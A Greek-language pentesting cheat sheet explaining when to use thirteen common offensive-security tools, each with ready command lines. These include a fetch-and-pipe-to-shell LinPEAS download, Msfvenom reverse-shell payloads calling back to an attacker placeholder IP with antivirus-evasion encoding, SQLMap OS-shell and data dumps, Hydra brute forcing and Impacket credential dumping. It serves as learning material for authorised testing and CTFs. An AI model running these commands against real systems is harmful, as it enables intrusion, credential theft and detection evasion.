Προσωπικό Βιβλίο Σημειώσεων Pentesting

Ένας εξαντλητικός οδηγός μεθοδολογίας, εντολών και παραμέτρων για την καθημερινή σου δουλειά.

🛠️ 1. Nmap (Network Mapper)

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Nmap είναι η αφετηρία κάθε infrastructure penetration test. Χρησιμοποιείται στη φάση του Active Reconnaissance για να χαρτογραφήσει το δίκτυο. Μέσω αυτού ανακαλύπτεις ποιες συσκευές είναι ζωντανές (Host Discovery), ποιες θύρες είναι ανοιχτές (Port Scanning), ποιες υπηρεσίες και εκδόσεις τρέχουν πίσω από αυτές (Service Version Detection), καθώς και το λειτουργικό σύστημα (OS Detection).

Ping Sweep (Host Discovery)
Discovery
Ανακαλύπτει ποιες IP είναι ενεργές σε ένα ολόκληρο υποδίκτυο χωρίς να σκανάρει θύρες.
nmap -sn 10.10.10.0/24
Syn Stealth Scan (Default)
Scanning
Σκανάρει στέλνοντας SYN πακέτα. Δεν ολοκληρώνει το TCP handshake (Half-open), κάνοντάς το πιο διακριτικό και γρήγορο.
sudo nmap -sS [TARGET_IP]
Aggressive Scan (All-in-One)
Scanning
Ενεργοποιεί OS detection (-O), version scanning (-sV), script scanning (-sC) και traceroute. Πολύ θορυβώδες.
nmap -A [TARGET_IP]
Πλήρες Scan Όλων των Θυρών
Deep Scan
Ελέγχει και τις 65535 θύρες (TCP). Απαραίτητο σε CTFs γιατί οι non-standard θύρες κρύβουν συχνά τα flags.
nmap -p- --min-rate 5000 [TARGET_IP]
UDP Port Scanning
UDP
Σκανάρει για UDP υπηρεσίες. Είναι εξαιρετικά αργό επειδή το UDP δεν στέλνει επιβεβαίωση λήψης.
sudo nmap -sU -p 53,161,162 [TARGET_IP]
Έλεγχος Ευπαθειών με Scripts (NSE)
Scripts
Χρησιμοποιεί τη βάση δεδομένων του Nmap Scripting Engine για να εντοπίσει γνωστά exploits και κενά ασφαλείας.
nmap --script vuln [TARGET_IP]
Αποθήκευση Αποτελεσμάτων σε Αρχεία
Output
Αποθηκεύει τα αποτελέσματα σε 3 formats ταυτόχρονα (normal, grepable, xml) για μετέπειτα ανάλυση.
nmap -sC -sV -oA nmap_report [TARGET_IP]

📁 2. Gobuster

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Gobuster επιστρατεύεται αμέσως μόλις το Nmap αναφέρει ανοιχτή θύρα Web (80 HTTP, 443 HTTPS, 8080 κλπ.). Χρησιμοποιείται για την ανακάλυψη κρυφών διαδρομών (Directory & File Enumeration) ή Subdomains. Βοηθάει να βρεις σελίδες διαχείρισης, log αρχεία, backups ή κώδικα που δεν είναι προσβάσιμος από τα μενού της ιστοσελίδας.

Βασικό Directory Brute-Forcing
Web Dir
Αναζητά φακέλους στον web server χρησιμοποιώντας μια κοινή λίστα (π.χ. directory-list-2.3-medium).
gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Αναζήτηση Αρχείων με Extensions
Files
Ψάχνει για συγκεκριμένα αρχεία. Πολύ χρήσιμο για τον εντοπισμό ευπαθών scripts ή ξεχασμένων αντιγράφων ασφαλείας.
gobuster dir -u http://[TARGET_IP] -w [WORDLIST] -x php,html,txt,bak,zip,old
DNS Subdomain Enumeration
DNS
Πραγματοποιεί brute force σε επίπεδο DNS για να εντοπίσει subdomains (π.χ. ://target.com, ://target.com).
gobuster dns -d target.com -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt
Advanced Web Enumeration (Threads & Status Codes)
Advanced
Αυξάνει την ταχύτητα (50 threads), αγνοεί τα redirects (301, 302) και παρακάμπτει τα SSL σφάλματα (-k).
gobuster dir -u https://[TARGET_IP] -w [WORDLIST] -t 50 -b "301,302,404" -k

🔑 3. Hydra

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Hydra χρησιμοποιείται στη φάση του Gaining Access (Exploitation). Όταν οι προηγούμενες φάσεις αναγνώρισης αποκαλύψουν πύλες εισόδου με αυθεντικοποίηση (π.χ. SSH, FTP, RDP, Web Forms) και διαθέτεις usernames (είτε από OSINT, είτε default, είτε από enumeration), το Hydra αναλαμβάνει να σπάσει τους κωδικούς μέσω λεξικού (Dictionary Attack).

SSH Brute Force (Γνωστός Χρήστης)
SSH
Χρησιμοποιεί το μικρό -l για έναν συγκεκριμένο χρήστη (admin) και το κεφαλαίο -P για να δοκιμάσει όλο το αρχείο rockyou.txt.
hydra -l admin -P /usr/share/wordlists/rockyou.txt [TARGET_IP] ssh
FTP Επίθεση με Λίστες (User & Pass)
FTP
Χρησιμοποιεί κεφαλαίο -L και κεφαλαίο -P. Δοκιμάζει συνδυαστικά κάθε χρήστη από το αρχείο users.txt με κάθε κωδικό από το passwords.txt.
hydra -L users.txt -P passwords.txt [TARGET_IP] ftp
Web Form Login (HTTP-POST)
Web Auth
Επιτίθεται σε φόρμες ιστοσελίδων. Χρειάζεται 3 κομμάτια (:): Το path (/login.php), τα ονόματα των input fields (user=^USER^&pass=^PASS^) και το μήνυμα λάθους αποτυχίας (F=Incorrect password).
hydra -l admin -P rockyou.txt [TARGET_IP] http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Incorrect password"
Ρύθμιση Θύρας και Ταχύτητας
Advanced
Το -s 2222 στοχεύει το SSH αν τρέχει σε μη-τυπική θύρα. Το -t 16 περιορίζει τις παράλληλες συνδέσεις στις 16 για να μην κρασάρει ο στόχος.
hydra -l root -P pass.txt -s 2222 -t 16 [TARGET_IP] ssh

👥 4. Enum4linux

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Enum4linux είναι ένα εξειδικευμένο εργαλείο που χρησιμοποιείται αποκλειστικά όταν το Nmap σου αναφέρει ότι οι θύρες 139 ή/και 445 (SMB / Samba) είναι ανοιχτές. Είναι εξαιρετικό για Windows συστήματα ή Linux servers που μοιράζονται αρχεία, καθώς προσπαθεί να εκμεταλλευτεί Null Sessions (σύνδεση χωρίς κωδικό) για να μαζέψει πληροφορίες.

Πλήρης Έλεγχος (Aggressive Enumeration)
All-In-One
Η πιο κλασική επιλογή. Το -a (all) τρέχει όλους τους δυνατούς ελέγχους μαζί: usernames, shares, password policies, groups και πληροφορίες λειτουργικού.
enum4linux -a [TARGET_IP]
Εξαγωγή Λίστας Χρηστών
Users
Προσπαθεί να τραβήξει μόνο τα ονόματα των χρηστών (usernames) μέσω RID cycling. Αυτή τη λίστα χρηστών τη σώζεις και τη χρησιμοποιείς μετά στο Hydra!
enum4linux -U [TARGET_IP]
Έλεγχος Κοινόχρηστων Φακέλων (Shares)
Shares
Εμφανίζει τα SMB shares. Ψάχνεις για φακέλους με Mapping/Listing: OK χωρίς credentials, καθώς εκεί μπορεί να κρύβονται ευαίσθητα αρχεία.
enum4linux -S [TARGET_IP]
Enumeration με Χρήση Credentials
Auth
Αν έχεις βρει ήδη ένα έγκυρο ζευγάρι username/password, τα δίνεις με τα -u και -p για να κάνεις enumeration ως συνδεδεμένος χρήστης, παίρνοντας βαθύτερες πληροφορίες.
enum4linux -u username -p password -a [TARGET_IP]

🎯 5. Nikto

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Nikto χρησιμοποιείται αμέσως μετά το Gobuster, όταν έχεις εντοπίσει έναν ενεργό Web Server (HTTP/HTTPS). Είναι ένας γρήγορος Web Vulnerability Scanner που ψάχνει για επικίνδυνα αρχεία, ξεπερασμένες εκδόσεις λογισμικού (outdated server software), εσφαλμένες ρυθμίσεις (misconfigurations) και ευάλωτα server plugins.

Βασική Σάρωση Ιστοσελίδας
Basic
Η πιο απλή μορφή ελέγχου. Σκανάρει την standard θύρα 80 για κοινά κενά ασφαλείας, server headers και επικίνδυνα αρχεία.
nikto -h [TARGET_IP]
Σάρωση Ασφαλούς Ιστοσελίδας (HTTPS)
SSL
Αν η ιστοσελίδα τρέχει σε SSL/TLS (θύρα 443), προσθέτεις το flag -ssl για να αναγκάσεις το Nikto να κρυπτογραφήσει την κίνηση και να ελέγξει το πιστοποιητικό.
nikto -h https://[TARGET_IP] -ssl
Σάρωση σε Μη-Τυπική Θύρα
Custom Port
Αν το Nmap σου δείξει ότι ο web server τρέχει σε εναλλακτική θύρα (π.χ. 8080 ή 8443), ορίζεις τη θύρα ξεχωριστά με το flag -p.
nikto -h [TARGET_IP] -p 8080
Αποθήκευση Αποτελεσμάτων
Export
Αποθηκεύει τα ευρήματα της σάρωσης σε αρχείο (HTML, txt, xml). Η μορφή HTML προτιμάται για εύκολη και καθαρή ανάγνωση των αποτελεσμάτων.
nikto -h http://[TARGET_IP] -o report.html -Format htm

🗄️ 6. SQLMap

🤔 Πότε και γιατί το χρησιμοποιώ;

Το SQLMap είναι ένα αυτοματοποιημένο εργαλείο που χρησιμοποιείται μόλις εντοπιστεί πιθανό documentation ή παράμετρος εισόδου ευπαθής σε SQL Injection (π.χ. `?id=1`). Χρησιμοποιείται για την επιβεβαίωση της ευπάθειας, την εξαγωγή δεδομένων από τη βάση (data dumping), την ανάγνωση αρχείων του συστήματος, ή ακόμα και την απόκτηση απομακρυσμένου κελύφους (OS shell).

Έλεγχος Παραμέτρου GET
GET Request
Ελέγχει αν μια συγκεκριμένη παράμετρος URL είναι ευπαθής και αναγνωρίζει το είδος της βάσης δεδομένων.
sqlmap -u "http://[TARGET_IP]/page.php?id=1" --batch
Έλεγχος POST Request (μέσω Αρχείου)
POST Request
Ελέγχει φόρμες (π.χ. Login) χρησιμοποιώντας ένα αποθηκευμένο HTTP request αρχείο από το Burp Suite.
sqlmap -r request.txt --batch
Απαρίθμηση Βάσεων Δεδομένων
Enumeration
Εξάγει την έκδοση (banner), το τρέχον όνομα χρήστη και όλες τις διαθέσιμες βάσεις δεδομένων του server.
sqlmap -u "http://[TARGET_IP]/page.php?id=1" --banner --current-user --dbs --batch
Εξαγωγή Δεδομένων (Dump) Πίνακα
Data Dump
Εξάγει όλα τα περιεχόμενα ενός συγκεκριμένου πίνακα από μια συγκεκριμένη βάση δεδομένων (ιδανικό για credentials).
sqlmap -u "http://[TARGET_IP]/page.php?id=1" -D [DB_NAME] -T [TABLE_NAME] --dump --batch
Απομακρυσμένο OS Shell
Exploitation
Προσπαθεί να αποκτήσει ένα interactive terminal (shell) στο λειτουργικό σύστημα του server αν τα προνόμια της DB το επιτρέπουν.
sqlmap -u "http://[TARGET_IP]/page.php?id=1" --os-shell --batch

🐧 7. LinPEAS

🤔 Πότε και γιατί το χρησιμοποιώ;

Το LinPEAS επιστρατεύεται αμέσως μόλις αποκτήσεις πρόσβαση χαμηλού επιπέδου (initial foothold) σε ένα Linux σύστημα. Είναι ένα αυτοματοποιημένο script που σαρώνει το σύστημα για πιθανές αδυναμίες, λάθος ρυθμίσεις (misconfigurations), ευπαθείς εκδόσεις πυρήνα (kernel exploits), SUID αρχεία ή κωδικούς σε plain text, με σκοπό την ανύψωση προνομίων σε Root.

Απευθείας Εκτέλεση στη Μνήμη (Χωρίς Αποθήκευση)
In-Memory
Κατεβάζει το script από τον τοπικό σου server και το εκτελεί απευθείας στη μνήμη του στόχου μέσω pipe, αποφεύγοντας τα ίχνη στον δίσκο.
curl -s http://[YOUR_IP]/linpeas.sh | sh
Τοπική Εκτέλεση & Αποθήκευση σε Log
Local Run
Εκτελεί το script τοπικά (αν το έχεις ήδη μεταφέρει) και αποθηκεύει τα έγχρωμα αποτελέσματα σε αρχείο κειμένου για μετέπειτα ανάλυση.
./linpeas.sh -a > linpeas.log
Ανάγνωση του Log με Διατήρηση Χρωμάτων
Analysis
Επειδή τα χρώματα του LinPEAS δείχνουν την κρισιμότητα (π.χ. το κόκκινο/κίτρινο είναι 99% Privilege Escalation vector), το διαβάζεις με την 'less' για να μην χαθούν.
less -r linpeas.log
Μεταφορά μέσω Netcat (Όταν δεν υπάρχει Curl/Wget)
Transfer
Στέλνει το script στον στόχο χρησιμοποιώντας netcat, σε περίπτωση που ο στόχος δεν έχει πρόσβαση στο διαδίκτυο ή δεν διαθέτει curl.
nc -w 3 [TARGET_IP] 1234 < linpeas.sh

🔨 8. John the Ripper

🤔 Πότε και γιατί το χρησιμοποιώ;

Το John the Ripper χρησιμοποιείται όταν έχεις αποκτήσει κρυπτογραφημένους κωδικούς (hashes) από βάσεις δεδομένων, αρχεία συστήματος (όπως το /etc/shadow) ή προστατευμένα αρχεία (zip, pdf, ssh keys). Χρησιμοποιείται για να σπάσει (crack) αυτούς τους κωδικούς μέσω επιθέσεων brute-force ή χρησιμοποιώντας λίστες λέξεων (wordlists).

Σπάσιμο με Λίστα Λέξεων (Wordlist)
Wordlist
Η πιο κλασική επίθεση. Δοκιμάζει τις λέξεις από μια λίστα (π.χ. rockyou.txt) πάνω στο αρχείο με τα hashes.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Ορισμός Συγκεκριμένου Format
Format
Επιταχύνει τη διαδικασία ορίζοντας χειροκίνητα τον τύπο του hash (π.χ. md5, sha256, ntlm) αν τον γνωρίζεις ήδη.
john --format=[FORMAT] --wordlist=rockyou.txt hashes.txt
Σπάσιμο Κλειδιού SSH (id_rsa)
SSH Key
Μετατρέπει πρώτα το ιδιωτικό κλειδί SSH σε μορφή που καταλαβαίνει ο John και μετά σπάει το passphrase.
ssh2john id_rsa > ssh.hash && john --wordlist=rockyou.txt ssh.hash
Σπάσιμο Κλειδωμένου Αρχείου ZIP
Archives
Εξάγει το hash από ένα προστατευμένο αρχείο ZIP και ξεκινάει την επίθεση για την εύρεση του κωδικού.
zip2john secret.zip > zip.hash && john --wordlist=rockyou.txt zip.hash
Προβολή Σπασμένων Κωδικών
Results
Εμφανίζει στην οθόνη τους κωδικούς που κατάφερε να σπάσει ο John από το συγκεκριμένο αρχείο.
john --show hashes.txt

🐙 9. Msfvenom

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Msfvenom επιστρατεύεται όταν χρειάζεται να δημιουργήσεις ένα κακόβουλο αρχείο (payload / reverse shell) για να αποκτήσεις πρόσβαση στο σύστημα του στόχου. Συνδυάζει τις δυνατότητες δημιουργίας payloads και κωδικοποίησης (encoding) του Metasploit Framework, επιτρέποντάς σου να παράγεις εκτελέσιμα αρχεία για Windows, Linux, Android, ή scripts για Web Servers (PHP, ASPX, JSP).

Windows Reverse Shell (.exe)
Windows
Δημιουργεί ένα εκτελέσιμο αρχείο για Windows το οποίο, μόλις τρέξει, συνδέεται πίσω στο μηχάνημά σου.
msfvenom -p windows/shell_reverse_tcp LHOST=[YOUR_IP] LPORT=[YOUR_PORT] -f exe -o shell.exe
Linux Reverse Shell (.elf)
Linux
Παράγει ένα εκτελέσιμο αρχείο ELF για συστήματα Linux, κατάλληλο για upload και εκτέλεση μέσω command injection.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[YOUR_IP] LPORT=[YOUR_PORT] -f elf -o shell.elf
PHP Reverse Shell (Web Malicious Script)
Web PHP
Δημιουργεί ένα αρχείο PHP. Ιδανικό για περιπτώσεις όπου μπορείς να ανεβάσεις αρχεία (File Upload Vulnerability) σε έναν Web Server.
msfvenom -p php/reverse_php LHOST=[YOUR_IP] LPORT=[YOUR_PORT] -f raw -o shell.php
Windows Meterpreter & Evasion (Shikata_ga_nai)
Advanced
Παράγει ένα προηγμένο interactive shell (Meterpreter) και το κωδικοποιεί 5 φορές για την αποφυγή απλών συστημάτων Antivirus.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YOUR_IP] LPORT=[YOUR_PORT] -e x86/shikata_ga_nai -i 5 -f exe -o met.exe

🔌 10. Netcat

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Netcat είναι ο "ελβετικός σουγιάς" των δικτύων. Χρησιμοποιείται σχεδόν σε κάθε φάση μιας δοκιμής διείσδυσης, κυρίως για τη δημιουργία listeners που υποδέχονται Reverse Shells, για τη χειροκίνητη αποστολή δεδομένων σε θύρες, για βασικό Port Scanning, αλλά και για τη γρήγορη μεταφορά αρχείων μεταξύ μηχανημάτων.

Δημιουργία Listener (Reverse Shell)
Listener
Ανοίγει μια θύρα στο μηχάνημά σου και περιμένει να συνδεθεί το payload ή το reverse shell από τον στόχο.
nc -lvnp [YOUR_PORT]
Σύνδεση σε Bind Shell / Port
Connect
Συνδέεται απευθείας σε μια συγκεκριμένη ανοιχτή θύρα του στόχου (ή σε ένα Bind Shell που τρέχει ήδη εκεί).
nc -nv [TARGET_IP] [TARGET_PORT]
Λήψη Αρχείου (Στον Στόχο)
Transfer
Ανοίγει μια θύρα στον στόχο και αποθηκεύει ό,τι δεδομένα λάβει απευθείας σε ένα τοπικό αρχείο.
nc -lvnp [PORT] > output_file.txt
Αποστολή Αρχείου (Από το Επιτιθέμενο)
Transfer
Στέλνει ένα αρχείο από το μηχάνημά σου προς τον listener που έχει στηθεί προηγουμένως στον στόχο.
nc -nv [TARGET_IP] [PORT] < file_to_send.txt
Banner Grabbing (Αναγνώριση Υπηρεσίας)
Enumeration
Συνδέεται στη θύρα μιας υπηρεσίας για να τραβήξει το banner (έκδοση λογισμικού) χωρίς να ξεκινήσει πλήρη σάρωση.
echo "" | nc -nv -w 2 [TARGET_IP] [PORT]

🦊 11. Burp Suite

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Burp Suite επιστρατεύεται κατά την αξιολόγηση και τον έλεγχο Web εφαρμογών. Λειτουργεί ως ενδιάμεσος (Interception Proxy) ανάμεσα στον browser σου και τον server. Σου επιτρέπει να βλέπεις, να τροποποιείς (Proxy/Repeater) και να αυτοματοποιείς επιθέσεις (Intruder) σε HTTP/HTTPS requests και responses σε πραγματικό χρόνο.

Καταγραφή & Τροποποίηση Κίνησης (Proxy)
Proxy
Παρακρατεί τα HTTP requests στον Proxy. Σου επιτρέπει να αλλάξεις παραμέτρους (π.χ. cookies, input fields) πριν αυτά φτάσουν στον server.
Proxy tab -> Intercept is ON -> [Modify Request] -> Forward
Επαναλαμβανόμενες Δοκιμές (Repeater)
Repeater
Στέλνει ένα συγκεκριμένο request ξανά και ξανά με χειροκίνητες αλλαγές. Ιδανικό για δοκιμές Command Injection, XSS και SQLi.
Right-Click on Request -> Send to Repeater (Ctrl+R)
Αυτοματοποιημένο Fuzzing & Brute Force (Intruder)
Intruder
Ρίχνει λίστες λέξεων σε συγκεκριμένα πεδία (π.χ. username/password) χρησιμοποιώντας διαφορετικά attack types (Sniper, Pitchfork).
Right-Click on Request -> Send to Intruder (Ctrl+I)
Αυτόματη Αντικατάσταση (Match & Replace)
Automation
Τροποποιεί αυτόματα headers ή δεδομένα σε κάθε request. Πολύ χρήσιμο για την παράκαμψη ελέγχων ταυτοποίησης (Privilege Escalation).
Proxy Settings -> Match and Replace Rules -> Add Rule

🦈 12. Wireshark

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Wireshark επιστρατεύεται για την ανάλυση της κίνησης του δικτύου (Packet Analysis) σε πραγματικό χρόνο ή μέσω αποθηκευμένων αρχείων καταγραφής (.pcap). Χρησιμοποιείται για την αποσφαλμάτωση δικτύων, την εύρεση ευαίσθητων δεδομένων που μεταφέρονται χωρίς κρυπτογράφηση (όπως plain text κωδικοί σε HTTP, FTP, Telnet) και την αναγνώριση ύποπτης δραστηριότητας.

Ζωντανή Καταγραφή Πακέτων
Capture
Επιλέγεις την κατάλληλη κάρτα δικτύου (π.χ. eth0, wlan0, tun0 για VPN) και ξεκινάς την καταγραφή της κίνησης.
Double-click on Interface (e.g., eth0) -> Click Blue Shark Fin to Start
Φιλτράρισμα με βάση IP & Θύρα
Filters
Απομονώνει την κίνηση που αφορά μια συγκεκριμένη διεύθυνση IP ή μια συγκεκριμένη θύρα, μειώνοντας τον θόρυβο.
ip.addr == [TARGET_IP] && tcp.port == 80
Παρακολούθηση Ροής (Follow TCP Stream)
Streams
Αναδομεί ολόκληρη τη συνομιλία μεταξύ δύο συσκευών, επιτρέποντάς σου να διαβάσεις τα δεδομένα σαν ενιαίο κείμενο.
Right-Click on Packet -> Follow -> TCP Stream
Εξαγωγή Αρχείων από το Δίκτυο
Export
Εντοπίζει και αποθηκεύει τοπικά αρχεία (εικόνες, εκτελέσιμα, έγγραφα) που μεταφέρθηκαν μέσω του μη κρυπτογραφημένου πρωτοκόλλου HTTP.
File -> Export Objects -> HTTP... -> Select File -> Save

🛡️ 13. Impacket

🤔 Πότε και γιατί το χρησιμοποιώ;

Το Impacket είναι μια συλλογή από Python scripts που χρησιμοποιούνται κατά τη δοκιμή διείσδυσης σε περιβάλλοντα Windows και Active Directory (AD). Είναι απαραίτητο για την αλληλεπίδραση με πρωτόκολλα δικτύου των Windows (SMB, MSRPC, NTLM, Kerberos), επιτρέποντάς σου να εκτελείς απομακρυσμένες εντολές, να εξάγεις credentials (secrets dumping) και να πραγματοποιείς επιθέσεις authentication.

Απομακρυσμένο Shell μέσω SMB (psexec)
Exploitation
Αποκτά ένα interactive shell με δικαιώματα SYSTEM χρησιμοποιώντας έγκυρα credentials (ή NTLM hash) ενός Administrator.
impacket-psexec [DOMAIN]/[USER]:[PASSWORD]@[TARGET_IP]
Stealthy Remote Execution (wmiexec)
Execution
Παρόμοιο με το psexec, αλλά εκτελεί εντολές μέσω WMI. Είναι πολύ πιο "ήσυχο" (stealthy) και αποφεύγει τον εντοπισμό από πολλά Antivirus.
impacket-wmiexec [DOMAIN]/[USER]:[PASSWORD]@[TARGET_IP]
Εξαγωγή Hashes / Credentials (secretsdump)
Credentials
Εξάγει απομακρυσμένα τα SAM και LSA μυστικά, καθώς και ολόκληρη τη βάση δεδομένων NTDS.dit αν πρόκειται για Domain Controller.
impacket-secretsdump [DOMAIN]/[USER]:[PASSWORD]@[TARGET_IP]
Active Directory AS-REP Roasting (GetNPUsers)
AD Attack
Αναζητά χρήστες στο AD που δεν απαιτούν Kerberos προ-αυθεντικοποίηση και επιστρέφει hashes έτοιμα για σπάσιμο στον John/Hashcat.
impacket-GetNPUsers [DOMAIN]/ -usersfile users.txt -format john -dc-ip [DC_IP]
Στήσιμο Τοπικού SMB Server για Μεταφορά Αρχείων
File Transfer
Δημιουργεί έναν κοινόχρηστο φάκελο SMB στο Linux σου, επιτρέποντας στο Windows θύμα να κατεβάσει αρχεία ή να σου στείλει δεδομένα.
impacket-smbserver [SHARE_NAME] $(pwd) -smb2support